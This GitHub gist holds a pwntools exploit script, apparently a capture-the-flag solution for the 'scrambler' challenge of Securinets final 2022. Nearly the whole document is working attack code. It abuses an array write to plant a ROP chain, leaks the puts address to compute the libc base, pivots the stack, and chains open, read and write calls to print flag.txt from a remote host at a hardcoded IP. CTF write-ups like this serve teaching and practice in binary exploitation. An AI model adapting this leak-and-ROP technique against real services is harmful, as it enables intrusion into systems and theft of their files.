Created
May 12, 2022 10:28
-
-
Save reductor/2f18efd45b1cc3b86062983b5ed15724 to your computer and use it in GitHub Desktop.
securinets final 2022 - scramble solve
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# This exploit template was generated via: | |
# $ pwn template ./scrambler --host 20.203.124.220 --port 1235 | |
from pwn import * | |
# Set up pwntools for the correct architecture | |
exe = context.binary = ELF('./scrambler_patched') | |
# Many built-in settings can be controlled on the command-line and show up | |
# in "args". For example, to dump all data sent/received, and disable ASLR | |
# for all created processes... | |
# ./exploit.py DEBUG NOASLR | |
# ./exploit.py GDB HOST=example.com PORT=4141 | |
host = args.HOST or '20.203.124.220' | |
port = int(args.PORT or 1235) | |
def start_local(argv=[], *a, **kw): | |
'''Execute the target binary locally''' | |
if args.GDB: | |
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) | |
else: | |
return process([exe.path] + argv, *a, **kw) | |
def start_remote(argv=[], *a, **kw): | |
'''Connect to the process on the remote host''' | |
io = connect(host, port) | |
if args.GDB: | |
gdb.attach(io, gdbscript=gdbscript) | |
return io | |
def start(argv=[], *a, **kw): | |
'''Start the exploit against the target.''' | |
if args.LOCAL: | |
return start_local(argv, *a, **kw) | |
else: | |
return start_remote(argv, *a, **kw) | |
# Specify your GDB script here for debugging | |
# GDB will be launched if the exploit is run via e.g. | |
# ./exploit.py GDB | |
gdbscript = ''' | |
tbreak *0x{exe.entry:x} | |
continue | |
'''.format(**locals()) | |
#=========================================================== | |
# EXPLOIT GOES HERE | |
#=========================================================== | |
# Arch: amd64-64-little | |
# RELRO: Partial RELRO | |
# Stack: Canary found | |
# NX: NX enabled | |
# PIE: No PIE (0x400000) | |
io = start() | |
def write_array_payload(offset, payload): | |
for offs, val in enumerate(payload): | |
io.sendlineafter(b'>', b'1') | |
io.sendlineafter(b'arg1', b'1') | |
io.sendlineafter(b'arg2', str(offset+offs).encode('ascii')) | |
io.sendlineafter(b'arg3', str(val).encode('ascii')) | |
if (offs % 6) == 0: | |
io.sendlineafter(b'>', b'1') | |
io.sendlineafter(b'arg1', b'1') | |
io.sendlineafter(b'arg2', b'-4') | |
io.sendlineafter(b'arg3', b'0') | |
new_stack = exe.bss()+0x100 | |
store_loc = exe.bss()+0x200 | |
percent_s = store_loc | |
percent_d = next(exe.search(b'%d\x00')) | |
rop = ROP(exe) | |
rop.puts(exe.got['puts']) | |
rop.rbp = new_stack | |
rop.raw(rop.ret) | |
rop.call('__isoc99_scanf',(percent_d, percent_s)) | |
rop.call('__isoc99_scanf',(percent_s, new_stack)) | |
#rop.migrate(new_stack) | |
rop.rbp = new_stack+8 | |
rop.raw(rop.leave) | |
print(rop.dump()) | |
payload = rop.chain() | |
write_array_payload(8*5, payload) | |
io.sendlineafter(b'>', b'2') | |
io.recvuntil(b'Good bye!\n') | |
puts_leak = io.recvline() | |
puts_leak = unpack(puts_leak[:-1],'all') | |
print('puts_leak', hex(puts_leak)) | |
libc = exe.libc | |
libc.address = puts_leak - libc.symbols['puts'] | |
print('libc', hex(libc.address)) | |
io.sendline(str(u32(b'%s\x00\x00')).encode('ascii')) | |
rop = ROP([exe, libc], base=new_stack) | |
rop.raw(rop.ret) | |
rop.raw(rop.ret) | |
# rop.open() uses openat() so do a syscall | |
rop.call(libc.symbols['syscall'],(constants.SYS_open, 'flag.txt', 0, 0)) | |
rop.read(3, store_loc, 100) | |
rop.write(1, store_loc, 100) | |
rop.abort() | |
print(rop.dump()) | |
io.sendline(rop.chain()) | |
io.send(payload) | |
print(io.recvall()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment